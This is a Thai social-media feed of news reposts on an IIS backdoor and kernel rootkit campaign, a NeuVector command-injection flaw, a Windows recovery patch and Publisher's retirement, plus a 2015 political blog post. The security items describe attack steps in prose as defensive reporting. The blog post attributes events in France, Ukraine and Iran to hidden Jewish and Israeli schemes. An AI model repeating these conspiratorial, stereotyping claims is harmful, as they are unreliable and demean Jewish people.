ซึ่งเป็นเทคนิคที่เรียกว่า link farm network หากวิธีฝัง backdoor ล้มเหลว แฮกเกอร์จะใช้เครื่องมือ Remote Monitoring & Management (RMM) ชื่อ GotoHTTP เพื่อควบคุมเครื่องผ่านเบราว์เซอร์โดยตรง นอกจากนี้ยังพบ rootkit ระดับ kernel ที่ชื่อว่า HIDDENDRIVER ซึ่งดัดแปลงจากโครงการโอเพ่นซอร์สชื่อ “Hidden” โดยใช้เทคนิค DKOM (Direct Kernel Object Manipulation) เพื่อซ่อน process, ไฟล์ และ registry key จากเครื่องมือวิเคราะห์ระบบ การโจมตีนี้ถูกจัดกลุ่มเป็น REF3927 และพบว่ามีความเชื่อมโยงกับแคมเปญที่ Microsoft และ AhnLab เคยรายงานมาก่อน โดยมีเป้าหมายเป็นเซิร์ฟเวอร์ IIS กว่า 571 เครื่องทั่วโลก ยกเว้นในประเทศจีน ซึ่งสอดคล้องกับพฤติกรรมของกลุ่มแฮกเกอร์จีนที่มักหลีกเลี่ยงการโจมตีภายในประเทศตัวเอง ✅ วิธีการโจมตี ➡️ ใช้คีย์ ASP.NET machineKey ที่ถูกเปิดเผยสู่สาธารณะ ➡️ สร้าง ViewState payload เพื่อรันคำสั่งบน IIS Server ➡️ ติดตั้ง TOLLBOOTH IIS module เป็น backdoor ➡️ ใช้ GotoHTTP หากฝัง backdoor ไม่สำเร็จ ➡️ ติดตั้ง rootkit HIDDENDRIVER เพื่อซ่อนการทำงาน ✅ ความสามารถของ TOLLBOOTH ➡️ มี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน ➡️ รองรับการอัปโหลดไฟล์และรันคำสั่ง ➡️ มี endpoint สำหรับ health check, debug และ clean ➡️ มี SEO cloaking engine เพื่อหลอก bot และ redirect ผู้ใช้ ➡️ ใช้ JSON config จากเซิร์ฟเวอร์ควบคุม ✅ ความสามารถของ HIDDENDRIVER ➡️ ใช้เทคนิค DKOM เพื่อซ่อน process, ไฟล์ และ registry ➡️ มี companion app ชื่อ HIDDENCLI เขียนด้วยภาษาจีน ➡️ ปรับปรุงจากโปรเจกต์ “Hidden” ด้วยฟีเจอร์ AMSI bypass และ whitelist process ➡️ ซ่อนตัวจากเครื่องมืออย่าง Process Explorer ได้ ✅ ขอบเขตของการโจมตี ➡️ พบการติดเชื้อใน IIS Server อย่างน้อย 571 เครื่อง ➡️ ครอบคลุมหลายอุตสาหกรรม เช่น การเงิน โลจิสติกส์ การศึกษา ➡️ ไม่มีเหยื่อในประเทศจีน – สะท้อนการใช้ geofencing ➡️ พบการติดตั้งซ้ำในหลายองค์กร แสดงว่าปัญหายังไม่ถูกแก้ที่ต้นเหตุ https://securityonline.info/chinese-hackers-exploit-exposed-asp-net-keys-to-deploy-tollbooth-iis-backdoor-and-kernel-rootkit/
    SECURITYONLINE.INFO
    Chinese Hackers Exploit Exposed ASP.NET Keys to Deploy TOLLBOOTH IIS Backdoor and Kernel Rootkit
    Elastic exposed Chinese threat actors exploiting public ASP.NET machine keys to deploy TOLLBOOTH IIS backdoor and HIDDENDRIVER kernel rootkit. The malware performs stealthy SEO cloaking.
    0 ความคิดเห็น 0 การแบ่งปัน 115 มุมมอง 0 รีวิว
  • “ช่องโหว่ CVE-2025-54469 ใน NeuVector – เสี่ยง RCE ระดับสูงสุด! แฮกเกอร์อาจสั่งรันคำสั่งในคอนเทนเนอร์ได้ทันที”

    SUSE Rancher Security ออกประกาศเตือนช่องโหว่ร้ายแรงใน NeuVector ซึ่งเป็นแพลตฟอร์มรักษาความปลอดภัยสำหรับ container โดยช่องโหว่นี้มีรหัสว่า CVE-2025-54469 และได้คะแนน CVSS เต็ม 10.0 หมายถึงความรุนแรงระดับสูงสุด

    ช่องโหว่นี้เกิดจากการที่ Enforcer container ใช้ environment variables ชื่อ CLUSTER_RPC_PORT และ CLUSTER_LAN_PORT เพื่อสร้างคำสั่ง shell ผ่านฟังก์ชัน popen() โดยไม่มีการตรวจสอบหรือ sanitize ค่าที่รับเข้ามาเลย ทำให้แฮกเกอร์สามารถ inject คำสั่งอันตรายเข้าไปได้โดยตรง

    เมื่อ Enforcer หยุดทำงาน มันจะตรวจสอบสถานะของ subprocess เช่น Consul โดยรันคำสั่ง shell ที่ประกอบจาก environment variables เหล่านี้ หากแฮกเกอร์สามารถควบคุมค่าตัวแปรได้ ก็สามารถสั่งรันคำสั่งใด ๆ ในระบบได้ทันที

    ผลกระทบคือแฮกเกอร์อาจได้สิทธิ์ root ภายใน container, เคลื่อนไหวไปยัง container อื่นใน Kubernetes cluster, หรือแม้แต่ปิดระบบ runtime security enforcement ของ NeuVector ได้เลย

    SUSE ได้ออกแพตช์ในเวอร์ชัน NeuVector v5.4.7 ซึ่งมีการตรวจสอบค่าตัวแปรก่อนนำไปใช้ในคำสั่ง shell แล้ว ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี

    รายละเอียดช่องโหว่ CVE-2025-54469
    เกิดจากการใช้ environment variables โดยไม่ sanitize
    ใช้ในคำสั่ง shell ผ่านฟังก์ชัน popen()
    ส่งผลให้เกิด command injection ได้
    อยู่ใน Enforcer container ของ NeuVector
    ได้คะแนน CVSS เต็ม 10.0

    ผลกระทบจากช่องโหว่
    แฮกเกอร์อาจได้สิทธิ์ root ภายใน container
    เคลื่อนไหวไปยัง container อื่นใน cluster ได้
    ปิดระบบ runtime security enforcement ของ NeuVector
    อาจนำไปสู่การโจมตีระดับ cluster-wide
    เสี่ยงต่อการถูกยึดระบบ DevSecOps ทั้งชุด

    การตอบสนองจาก SUSE
    ออกแพตช์ใน NeuVector v5.4.7
    เพิ่มการตรวจสอบค่าตัวแปรก่อนใช้ใน shell command
    แนะนำให้อัปเดตทันทีเพื่อป้องกันการโจมตี
    เตือนผู้ใช้ให้ตรวจสอบ container ที่มีสิทธิ์สูง

    https://securityonline.info/critical-neuvector-rce-flaw-cve-2025-54469-cvss-10-0-allows-command-injection-via-unsanitized-environment-variables/
    🚨 “ช่องโหว่ CVE-2025-54469 ใน NeuVector – เสี่ยง RCE ระดับสูงสุด! แฮกเกอร์อาจสั่งรันคำสั่งในคอนเทนเนอร์ได้ทันที” SUSE Rancher Security ออกประกาศเตือนช่องโหว่ร้ายแรงใน NeuVector ซึ่งเป็นแพลตฟอร์มรักษาความปลอดภัยสำหรับ container โดยช่องโหว่นี้มีรหัสว่า CVE-2025-54469 และได้คะแนน CVSS เต็ม 10.0 หมายถึงความรุนแรงระดับสูงสุด ช่องโหว่นี้เกิดจากการที่ Enforcer container ใช้ environment variables ชื่อ CLUSTER_RPC_PORT และ CLUSTER_LAN_PORT เพื่อสร้างคำสั่ง shell ผ่านฟังก์ชัน popen() โดยไม่มีการตรวจสอบหรือ sanitize ค่าที่รับเข้ามาเลย ทำให้แฮกเกอร์สามารถ inject คำสั่งอันตรายเข้าไปได้โดยตรง เมื่อ Enforcer หยุดทำงาน มันจะตรวจสอบสถานะของ subprocess เช่น Consul โดยรันคำสั่ง shell ที่ประกอบจาก environment variables เหล่านี้ หากแฮกเกอร์สามารถควบคุมค่าตัวแปรได้ ก็สามารถสั่งรันคำสั่งใด ๆ ในระบบได้ทันที ผลกระทบคือแฮกเกอร์อาจได้สิทธิ์ root ภายใน container, เคลื่อนไหวไปยัง container อื่นใน Kubernetes cluster, หรือแม้แต่ปิดระบบ runtime security enforcement ของ NeuVector ได้เลย SUSE ได้ออกแพตช์ในเวอร์ชัน NeuVector v5.4.7 ซึ่งมีการตรวจสอบค่าตัวแปรก่อนนำไปใช้ในคำสั่ง shell แล้ว ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี ✅ รายละเอียดช่องโหว่ CVE-2025-54469 ➡️ เกิดจากการใช้ environment variables โดยไม่ sanitize ➡️ ใช้ในคำสั่ง shell ผ่านฟังก์ชัน popen() ➡️ ส่งผลให้เกิด command injection ได้ ➡️ อยู่ใน Enforcer container ของ NeuVector ➡️ ได้คะแนน CVSS เต็ม 10.0 ✅ ผลกระทบจากช่องโหว่ ➡️ แฮกเกอร์อาจได้สิทธิ์ root ภายใน container ➡️ เคลื่อนไหวไปยัง container อื่นใน cluster ได้ ➡️ ปิดระบบ runtime security enforcement ของ NeuVector ➡️ อาจนำไปสู่การโจมตีระดับ cluster-wide ➡️ เสี่ยงต่อการถูกยึดระบบ DevSecOps ทั้งชุด ✅ การตอบสนองจาก SUSE ➡️ ออกแพตช์ใน NeuVector v5.4.7 ➡️ เพิ่มการตรวจสอบค่าตัวแปรก่อนใช้ใน shell command ➡️ แนะนำให้อัปเดตทันทีเพื่อป้องกันการโจมตี ➡️ เตือนผู้ใช้ให้ตรวจสอบ container ที่มีสิทธิ์สูง https://securityonline.info/critical-neuvector-rce-flaw-cve-2025-54469-cvss-10-0-allows-command-injection-via-unsanitized-environment-variables/
    SECURITYONLINE.INFO
    Critical NeuVector RCE Flaw (CVE-2025-54469, CVSS 10.0) Allows Command Injection via Unsanitized Environment Variables
    SUSE patched a Critical RCE flaw (CVE-2025-54469, CVSS 10.0) in NeuVector Enforcer that allows attackers to inject commands via unsanitized environment variables, risking container root shell access.
    0 ความคิดเห็น 0 การแบ่งปัน 79 มุมมอง 0 รีวิว
  • “Microsoft รีบปล่อยแพตช์ฉุกเฉิน KB5070773 หลังอัปเดตพัง WinRE – คีย์บอร์ดและเมาส์ USB ใช้ไม่ได้ในโหมดกู้คืน”

    Microsoft ต้องรีบออกแพตช์ฉุกเฉิน KB5070773 เพื่อแก้ปัญหาที่เกิดจากอัปเดต KB5066835 ซึ่งปล่อยออกมาเมื่อ 14 ตุลาคม 2025 โดยอัปเดตนั้นทำให้ระบบ Windows Recovery Environment (WinRE) บน Windows 11 เวอร์ชัน 24H2 และ 25H2 ไม่สามารถใช้งานคีย์บอร์ดและเมาส์แบบ USB ได้เลย

    ปัญหานี้ร้ายแรงกว่าที่คิด เพราะ WinRE คือเครื่องมือหลักในการกู้คืนระบบ เช่น Startup Repair หรือ Reset This PC ถ้าอุปกรณ์อินพุตใช้ไม่ได้ ก็เท่ากับว่าผู้ใช้ไม่สามารถกู้ระบบได้เลย โดยเฉพาะในกรณีที่เครื่องบูตไม่ขึ้น

    สำหรับผู้ที่ยังสามารถเข้าสู่ระบบ Windows ได้ แค่ติดตั้งแพตช์ KB5070773 ผ่าน Windows Update แล้วรีบูตเครื่องก็จะใช้งานได้ตามปกติ แต่ถ้าระบบเข้าไม่ได้เลย Microsoft แนะนำให้ใช้หน้าจอสัมผัส, พอร์ต PS/2 (ถ้ามี), หรือ USB recovery drive แทน

    นี่เป็นครั้งที่สองในรอบไม่กี่เดือนที่ WinRE มีปัญหาใหญ่ เพราะในเดือนสิงหาคมก็เคยมีอัปเดตด้านความปลอดภัยที่ทำให้ฟีเจอร์ Reset This PC ใช้งานไม่ได้เช่นกัน ซึ่งทำให้หลายคนเริ่มตั้งคำถามถึงคุณภาพของการทดสอบก่อนปล่อยอัปเดตของ Microsoft

    รายละเอียดแพตช์ KB5070773
    แก้ปัญหา USB keyboard และ mouse ใช้ไม่ได้ใน WinRE
    ส่งผลกระทบกับ Windows 11 เวอร์ชัน 24H2 และ 25H2
    ปัญหาเกิดจากอัปเดต KB5066835 เมื่อ 14 ตุลาคม 2025
    แพตช์ใหม่สามารถติดตั้งผ่าน Windows Update ได้ทันที
    แก้ไขรวมอยู่ใน rollup ถัดไปสำหรับผู้ที่พลาดแพตช์ฉุกเฉิน

    ผลกระทบและคำแนะนำ
    ผู้ใช้ที่เข้า Windows ได้ควรติดตั้งแพตช์ทันที
    ผู้ที่ติดอยู่ใน recovery loop ต้องใช้ touchscreen, PS/2 หรือ USB recovery drive
    องค์กรสามารถใช้ Preboot Execution Environment (PXE) ผ่าน Configuration Manager

    บริบทและความน่ากังวล
    เป็นปัญหา WinRE ครั้งที่สองในรอบ 2 เดือน
    ครั้งก่อนในเดือนสิงหาคมทำให้ Reset This PC ใช้งานไม่ได้
    สะท้อนความเปราะบางของระบบอัปเดต Windows
    Microsoft ยังไม่อธิบายว่าบั๊กนี้หลุดจากการทดสอบได้อย่างไร

    https://www.tomshardware.com/software/windows/microsoft-rushes-out-emergency-windows-11-patch
    🛠️ “Microsoft รีบปล่อยแพตช์ฉุกเฉิน KB5070773 หลังอัปเดตพัง WinRE – คีย์บอร์ดและเมาส์ USB ใช้ไม่ได้ในโหมดกู้คืน” Microsoft ต้องรีบออกแพตช์ฉุกเฉิน KB5070773 เพื่อแก้ปัญหาที่เกิดจากอัปเดต KB5066835 ซึ่งปล่อยออกมาเมื่อ 14 ตุลาคม 2025 โดยอัปเดตนั้นทำให้ระบบ Windows Recovery Environment (WinRE) บน Windows 11 เวอร์ชัน 24H2 และ 25H2 ไม่สามารถใช้งานคีย์บอร์ดและเมาส์แบบ USB ได้เลย ปัญหานี้ร้ายแรงกว่าที่คิด เพราะ WinRE คือเครื่องมือหลักในการกู้คืนระบบ เช่น Startup Repair หรือ Reset This PC ถ้าอุปกรณ์อินพุตใช้ไม่ได้ ก็เท่ากับว่าผู้ใช้ไม่สามารถกู้ระบบได้เลย โดยเฉพาะในกรณีที่เครื่องบูตไม่ขึ้น สำหรับผู้ที่ยังสามารถเข้าสู่ระบบ Windows ได้ แค่ติดตั้งแพตช์ KB5070773 ผ่าน Windows Update แล้วรีบูตเครื่องก็จะใช้งานได้ตามปกติ แต่ถ้าระบบเข้าไม่ได้เลย Microsoft แนะนำให้ใช้หน้าจอสัมผัส, พอร์ต PS/2 (ถ้ามี), หรือ USB recovery drive แทน นี่เป็นครั้งที่สองในรอบไม่กี่เดือนที่ WinRE มีปัญหาใหญ่ เพราะในเดือนสิงหาคมก็เคยมีอัปเดตด้านความปลอดภัยที่ทำให้ฟีเจอร์ Reset This PC ใช้งานไม่ได้เช่นกัน ซึ่งทำให้หลายคนเริ่มตั้งคำถามถึงคุณภาพของการทดสอบก่อนปล่อยอัปเดตของ Microsoft ✅ รายละเอียดแพตช์ KB5070773 ➡️ แก้ปัญหา USB keyboard และ mouse ใช้ไม่ได้ใน WinRE ➡️ ส่งผลกระทบกับ Windows 11 เวอร์ชัน 24H2 และ 25H2 ➡️ ปัญหาเกิดจากอัปเดต KB5066835 เมื่อ 14 ตุลาคม 2025 ➡️ แพตช์ใหม่สามารถติดตั้งผ่าน Windows Update ได้ทันที ➡️ แก้ไขรวมอยู่ใน rollup ถัดไปสำหรับผู้ที่พลาดแพตช์ฉุกเฉิน ✅ ผลกระทบและคำแนะนำ ➡️ ผู้ใช้ที่เข้า Windows ได้ควรติดตั้งแพตช์ทันที ➡️ ผู้ที่ติดอยู่ใน recovery loop ต้องใช้ touchscreen, PS/2 หรือ USB recovery drive ➡️ องค์กรสามารถใช้ Preboot Execution Environment (PXE) ผ่าน Configuration Manager ✅ บริบทและความน่ากังวล ➡️ เป็นปัญหา WinRE ครั้งที่สองในรอบ 2 เดือน ➡️ ครั้งก่อนในเดือนสิงหาคมทำให้ Reset This PC ใช้งานไม่ได้ ➡️ สะท้อนความเปราะบางของระบบอัปเดต Windows ➡️ Microsoft ยังไม่อธิบายว่าบั๊กนี้หลุดจากการทดสอบได้อย่างไร https://www.tomshardware.com/software/windows/microsoft-rushes-out-emergency-windows-11-patch
    0 ความคิดเห็น 0 การแบ่งปัน 80 มุมมอง 0 รีวิว
  • มทร.ล้านนา จับมือ สสปท. ยกระดับมาตรฐาน SHE เตรียมความพร้อมนักศึกษา ก่อนเข้าสู่ตลาดแรงงานอย่างปลอดภัย
    https://www.thai-tai.tv/news/22010/
    .
    #ไทยไท #มทรล้านนา #สสปท #ความปลอดภัยในการทำงาน #อาชีวอนามัย #SHE

    มทร.ล้านนา จับมือ สสปท. ยกระดับมาตรฐาน SHE เตรียมความพร้อมนักศึกษา ก่อนเข้าสู่ตลาดแรงงานอย่างปลอดภัย https://www.thai-tai.tv/news/22010/ . #ไทยไท #มทรล้านนา #สสปท #ความปลอดภัยในการทำงาน #อาชีวอนามัย #SHE
    0 ความคิดเห็น 0 การแบ่งปัน 47 มุมมอง 0 รีวิว
  • ทำหน้าที่ ขุดคุ้ย สอดส่อง ฉวยโฉบเอกสาร แต่ถ้าใครคิดว่าแบนี้อิหร่านคงโป๊ไม่เหลือ เรียกว่ายังไม่รู้จักอิหร่านจริง!

    แล้วก็เป็นไปตามคาด การเจรจาไม่เป็นผล ตกลงกันไม่ได้ วันสิ้นสุดการเจรจา ต้องมีการต่ออายุไปถึงกลางปี 2015 แสดงว่า อิสราเอลยังทำภาระกิจไม่สำเร็จ ระหว่างนี้หากมีการเปลี่ยนค่าย เปลี่ยนพฤติกรรม พวกซุ่มเงียบเปลี่ยนใจเปิดตัว อิสราเอลจะเอาอยู่ไหม น้ำมันในตะวันออกกลาง ยังเป็นของรัก ของหวง ของนักล่าใบตองแห้งและพวก โดยเฉพาะลูกพี่ชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่กบไต๋เงียบกริบ และใช้นักล่า ออกหน้าแทน… อย่างเคย

    จะเห็นว่าอิสราเอล กำลังเล่นบทหนัก ในการหนุน หรือ ผลักดัน การขยับหมากของนักล่าใบตองแห้ง นอกจากนี้ อิสราเอลยังมีเป้าหมาย ลับลึกซ่อนอยู่อีกหลายเรื่อง

    ถ้าสังเกตกัน จะเห็นว่า อิสราเอล พยายามเน้นให้เหตุการณ์ที่เกิดขึ้นที่ฝรั่งเศส เป็นเรื่องการรังแกยิว โดยนาย Liberman รัฐมนตรีต่างประเทศของอิสราเอล ซึ่งไปเดินแถวคล้องแขนที่ปารีสด้วย บอกว่า เขาดู CNN แล้ว ปรากฏว่า ไม่มีการเสนอข่าวในมุมของชาวยิวเลยนะ เช่น ซูเปอร์มาร์เก็ต Kosher ที่ยิงกัน ก็เป็นของชาวยิว หรือ พวกตัวประกัน ก็เป็นพวกชาวยิว พร้อมพูดว่า
    ” เราควรต้องพูดกันอย่างซื่อสัตย์ ไม่ต้องอาย และ เอาทุกอย่างวางบนโต๊ะ เพราะที่มาของการฆาตกรรมหมู่ชาวยิว มาจากมุสลิมเคร่งจัดด้านหนึ่ง และการด่าชาวยิวอย่างรุนแรงและไม่มีเหตุผลอีกด้านหนึ่ง”

    นี่ก็เป็นการให้ข่าวแบบกาฝาก คราวนี้ฝากไปให้ใคร

    ฝรั่งเศส มีชาวยิวอาศัยอยู่จำนวนมาก ไม่ต่ำกว่า 6 แสนคน นับเป็นอันดับ 3 ในโลก รองจากอิสราเอล และอเมริกา และฝรั่งเศส อีกเช่นเดียวกัน ที่มีคนนับถืออิสลามอาศัยอยู่มากที่สุดในยุโรป มีจำนวนไม่น้อยกว่า 4.7 ล้านคน ถึง 7.7 ล้านคน แล้วแต่แหล่งที่มาของข้อมูล

    ยูเครน ที่กำลังเล่นกันจนเละ จะกลายเป็นโรงละครสัตว์อยู่แล้วนั้น อิสราเอลก็แอบสนับสนุนฝ่ายที่ต่อสู้กับคุณพี่ปูตินอย่างเงียบ เชียบ แต่แข็งขัน อย่าลืมว่า คุณนาย Nuland นางเหยี่ยวของอเมริกา เจ้าของวลีเด็ด **** EU เป็นคนเลือกนาย Yatsenyuk ยิวหนุ่ม ไปเป็นนายกรัฐมนตรียูเครน ยูเครนจึง ไม่ได้เป็นเพียงสนามชิงท่อส่งแก๊ส มีหลายฝ่าย แอบหวังที่จะเอายูเครน เป็นบ้านยิวสาขา 2

    ฝรั่งเศสจึงน่าสนใจ ที่จะใช้เป็นสนามทดลอง หรือห้องทดลอง ทฤษฏีต่างๆ ก่อนมีการปฏิบัติการณ์ของจริง เพื่อดูปฏิกริยา การโต้ตอบ และกำลังสนับสนุนของแต่ละฝ่าย

    ในการทำศึกสงคราม แต่ละฝ่าย ต่างมียุทธศาสตร์ และต่างมีวาระซ่อนเร้น ซึ่งเราอาจจะยังเห็นไม่หมด มองไม่ชัดในตอนนี้ เพราะพวกเขาคงจะยังไม่เปิดฉากแสดงกันที่สถานที่จริง หรือถ้าเปิด มันก็ดูเป็นฉาก ที่ไม่ต่อเนื่องกัน

    เช่นเรื่องยูเครนกับตะวันออกกลาง อาจเกี่ยวโยงกันอย่างที่เรานึกไม่ถึง และเช่นเดียวกับการลงมติ คว่ำบาตรรัสเซีย ที่กลุ่มประเทศในสหภาพยุโรป กำลังทดสอบความแข็งของข้อกัน และคงจะรู้กันเร็วๆนี้ ว่า ใครกันแน่ ที่ข้อแข็งในสหภาพยุโรป

    ส่วนเรื่องการคว่ำบาตรอิหร่าน ซึ่งสมาชิกรัฐสภาอเมริกันกลุ่มหนึ่ง กำลังกระเหี้ยน กระหือรือ ที่จะยื่นเรื่องให้รัฐสภา ลงมติเพิ่มการคว่ำบาตรอิหร่านเพิ่ม ทั้งที่การเจรจาเรื่องพัฒนานิวเคลียร์ ที่เพิ่งเริ่ม หลังจากมีการต่ออายุใหม่ และมีข่าวว่า นายโอบามาบอกว่า พยายามจะใช้สิทธิวีโต้ เพราะการเจรจากับอิหร่านยังไปได้อยู่

    คงจะไม่เป็นเรื่องน่าแปลกใจ ถ้าการพยายามคว่ำบาตรอิหร่านเพิ่มนั้น ได้รับการสนับสนุนจากกลุ่มยิว ทั้งใน และนอกอเมริกา ถ้าอิหร่านล้มคว่ำตามบาตรในตะวันออกกลาง ที่จะลุกขึ้นตีปีกคืออิสราเอล เพราะถ้าเจอทั้งอิหร่าน และตุรกี พร้อมกัน ในตะวันออกกลาง มันเหนื่อยโว้ย สะกัดไปทีละประเทศ น่าจะดีกว่า ส่วนความฝันเรื่องยูเครน ถ้ารัสเซียหมดแรง ถอบฉากเลิกขวาง อิสราเอลก็หวานคอ เอะ นี่ตกลงเป็นเรื่องของยิวล้วนๆหรือไง แล้วพวกลูกพี่ ทั้งนักล่าใบตองแห้ง และชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่คอยกำกับ ทุกรายการ ยังต้องการให้จัดการเรื่องอะไรอีกครับ ?!

    สวัสดีครับ
    คนเล่านิทาน
    18 มค. 2558
    ทำหน้าที่ ขุดคุ้ย สอดส่อง ฉวยโฉบเอกสาร แต่ถ้าใครคิดว่าแบนี้อิหร่านคงโป๊ไม่เหลือ เรียกว่ายังไม่รู้จักอิหร่านจริง! แล้วก็เป็นไปตามคาด การเจรจาไม่เป็นผล ตกลงกันไม่ได้ วันสิ้นสุดการเจรจา ต้องมีการต่ออายุไปถึงกลางปี 2015 แสดงว่า อิสราเอลยังทำภาระกิจไม่สำเร็จ ระหว่างนี้หากมีการเปลี่ยนค่าย เปลี่ยนพฤติกรรม พวกซุ่มเงียบเปลี่ยนใจเปิดตัว อิสราเอลจะเอาอยู่ไหม น้ำมันในตะวันออกกลาง ยังเป็นของรัก ของหวง ของนักล่าใบตองแห้งและพวก โดยเฉพาะลูกพี่ชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่กบไต๋เงียบกริบ และใช้นักล่า ออกหน้าแทน… อย่างเคย จะเห็นว่าอิสราเอล กำลังเล่นบทหนัก ในการหนุน หรือ ผลักดัน การขยับหมากของนักล่าใบตองแห้ง นอกจากนี้ อิสราเอลยังมีเป้าหมาย ลับลึกซ่อนอยู่อีกหลายเรื่อง ถ้าสังเกตกัน จะเห็นว่า อิสราเอล พยายามเน้นให้เหตุการณ์ที่เกิดขึ้นที่ฝรั่งเศส เป็นเรื่องการรังแกยิว โดยนาย Liberman รัฐมนตรีต่างประเทศของอิสราเอล ซึ่งไปเดินแถวคล้องแขนที่ปารีสด้วย บอกว่า เขาดู CNN แล้ว ปรากฏว่า ไม่มีการเสนอข่าวในมุมของชาวยิวเลยนะ เช่น ซูเปอร์มาร์เก็ต Kosher ที่ยิงกัน ก็เป็นของชาวยิว หรือ พวกตัวประกัน ก็เป็นพวกชาวยิว พร้อมพูดว่า ” เราควรต้องพูดกันอย่างซื่อสัตย์ ไม่ต้องอาย และ เอาทุกอย่างวางบนโต๊ะ เพราะที่มาของการฆาตกรรมหมู่ชาวยิว มาจากมุสลิมเคร่งจัดด้านหนึ่ง และการด่าชาวยิวอย่างรุนแรงและไม่มีเหตุผลอีกด้านหนึ่ง” นี่ก็เป็นการให้ข่าวแบบกาฝาก คราวนี้ฝากไปให้ใคร ฝรั่งเศส มีชาวยิวอาศัยอยู่จำนวนมาก ไม่ต่ำกว่า 6 แสนคน นับเป็นอันดับ 3 ในโลก รองจากอิสราเอล และอเมริกา และฝรั่งเศส อีกเช่นเดียวกัน ที่มีคนนับถืออิสลามอาศัยอยู่มากที่สุดในยุโรป มีจำนวนไม่น้อยกว่า 4.7 ล้านคน ถึง 7.7 ล้านคน แล้วแต่แหล่งที่มาของข้อมูล ยูเครน ที่กำลังเล่นกันจนเละ จะกลายเป็นโรงละครสัตว์อยู่แล้วนั้น อิสราเอลก็แอบสนับสนุนฝ่ายที่ต่อสู้กับคุณพี่ปูตินอย่างเงียบ เชียบ แต่แข็งขัน อย่าลืมว่า คุณนาย Nuland นางเหยี่ยวของอเมริกา เจ้าของวลีเด็ด Fuck EU เป็นคนเลือกนาย Yatsenyuk ยิวหนุ่ม ไปเป็นนายกรัฐมนตรียูเครน ยูเครนจึง ไม่ได้เป็นเพียงสนามชิงท่อส่งแก๊ส มีหลายฝ่าย แอบหวังที่จะเอายูเครน เป็นบ้านยิวสาขา 2 ฝรั่งเศสจึงน่าสนใจ ที่จะใช้เป็นสนามทดลอง หรือห้องทดลอง ทฤษฏีต่างๆ ก่อนมีการปฏิบัติการณ์ของจริง เพื่อดูปฏิกริยา การโต้ตอบ และกำลังสนับสนุนของแต่ละฝ่าย ในการทำศึกสงคราม แต่ละฝ่าย ต่างมียุทธศาสตร์ และต่างมีวาระซ่อนเร้น ซึ่งเราอาจจะยังเห็นไม่หมด มองไม่ชัดในตอนนี้ เพราะพวกเขาคงจะยังไม่เปิดฉากแสดงกันที่สถานที่จริง หรือถ้าเปิด มันก็ดูเป็นฉาก ที่ไม่ต่อเนื่องกัน เช่นเรื่องยูเครนกับตะวันออกกลาง อาจเกี่ยวโยงกันอย่างที่เรานึกไม่ถึง และเช่นเดียวกับการลงมติ คว่ำบาตรรัสเซีย ที่กลุ่มประเทศในสหภาพยุโรป กำลังทดสอบความแข็งของข้อกัน และคงจะรู้กันเร็วๆนี้ ว่า ใครกันแน่ ที่ข้อแข็งในสหภาพยุโรป ส่วนเรื่องการคว่ำบาตรอิหร่าน ซึ่งสมาชิกรัฐสภาอเมริกันกลุ่มหนึ่ง กำลังกระเหี้ยน กระหือรือ ที่จะยื่นเรื่องให้รัฐสภา ลงมติเพิ่มการคว่ำบาตรอิหร่านเพิ่ม ทั้งที่การเจรจาเรื่องพัฒนานิวเคลียร์ ที่เพิ่งเริ่ม หลังจากมีการต่ออายุใหม่ และมีข่าวว่า นายโอบามาบอกว่า พยายามจะใช้สิทธิวีโต้ เพราะการเจรจากับอิหร่านยังไปได้อยู่ คงจะไม่เป็นเรื่องน่าแปลกใจ ถ้าการพยายามคว่ำบาตรอิหร่านเพิ่มนั้น ได้รับการสนับสนุนจากกลุ่มยิว ทั้งใน และนอกอเมริกา ถ้าอิหร่านล้มคว่ำตามบาตรในตะวันออกกลาง ที่จะลุกขึ้นตีปีกคืออิสราเอล เพราะถ้าเจอทั้งอิหร่าน และตุรกี พร้อมกัน ในตะวันออกกลาง มันเหนื่อยโว้ย สะกัดไปทีละประเทศ น่าจะดีกว่า ส่วนความฝันเรื่องยูเครน ถ้ารัสเซียหมดแรง ถอบฉากเลิกขวาง อิสราเอลก็หวานคอ เอะ นี่ตกลงเป็นเรื่องของยิวล้วนๆหรือไง แล้วพวกลูกพี่ ทั้งนักล่าใบตองแห้ง และชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่คอยกำกับ ทุกรายการ ยังต้องการให้จัดการเรื่องอะไรอีกครับ ?! สวัสดีครับ คนเล่านิทาน 18 มค. 2558
    0 ความคิดเห็น 0 การแบ่งปัน 166 มุมมอง 0 รีวิว
  • “Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026 — ปิดตำนานเครื่องมือออกแบบยุค 90” — เมื่อแอปสร้างใบปลิวและจดหมายข่าวที่เคยอยู่ในทุกบ้านกำลังจะอำลาอย่างถาวร

    Microsoft ประกาศว่าจะยุติการสนับสนุนแอป Publisher อย่างเป็นทางการในเดือนตุลาคม 2026 ซึ่งตรงกับวันหมดอายุของ Office LTSC 2021 โดยหลังจากวันนั้น Publisher จะถูกถอดออกจาก Microsoft 365 และไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีกต่อไปในเวอร์ชันใหม่

    Publisher เปิดตัวครั้งแรกในปี 1991 เพื่อให้ผู้ใช้ทั่วไปสามารถออกแบบสิ่งพิมพ์ เช่น ใบปลิว, โบรชัวร์, จดหมายข่าว โดยไม่ต้องใช้โปรแกรมระดับมืออาชีพอย่าง QuarkXPress หรือ Adobe InDesign ด้วยราคาที่เข้าถึงได้และการใช้งานง่าย ทำให้ Publisher กลายเป็นเครื่องมือยอดนิยมในโรงเรียน, ธุรกิจขนาดเล็ก และผู้ใช้ตามบ้าน

    แม้จะไม่เคยครองใจนักออกแบบมืออาชีพ แต่ Publisher ก็มีบทบาทสำคัญในการ “ประชาธิปไตยด้านการออกแบบ” โดยเปิดโอกาสให้ทุกคนสามารถสร้างสื่อสิ่งพิมพ์ได้ด้วยตัวเอง

    หลังจากการยุติการสนับสนุน Microsoft แนะนำให้ผู้ใช้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู และหากต้องการแก้ไข ให้เปิด PDF ใน Word — แม้ว่าการจัดวางอาจเพี้ยน โดยเฉพาะไฟล์ที่มีกราฟิกจำนวนมาก

